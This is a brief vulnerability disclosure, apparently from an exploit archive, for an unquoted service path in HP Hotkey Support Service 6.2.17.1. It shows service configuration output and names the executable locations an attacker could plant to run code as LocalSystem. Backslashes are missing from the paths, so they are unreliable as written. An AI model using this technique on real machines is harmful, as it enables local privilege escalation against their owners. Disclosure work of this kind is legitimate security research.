HP Hotkey Support Service 6.2.17.1 Privilege Escalation
Posted on 21 January 2017
# Exploit Title: [HP Hotkey Support Service - Unquoted Service Path Privilege Escalation] # Date: [date] # Exploit Author: [Owais Mehtab, Tayeeb Rana] # Vendor Homepage: [http://www.hp.com/] # Software Link: [http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_129672_1] # Version: [6.2.17.1] # Tested on: [Win7 Sp1] C:>sc qc "HP Hotkey Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HP Hotkey Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : D:Program Files (x86)HPHP Hotkey SupportHotkeyService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HP Hotkey Service DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem An attacker can place binaries in following locations to execute it under LocalSystem account since the binary path is not in double quotes D:Program.exe D:Program Files (x86)HPHP.exe
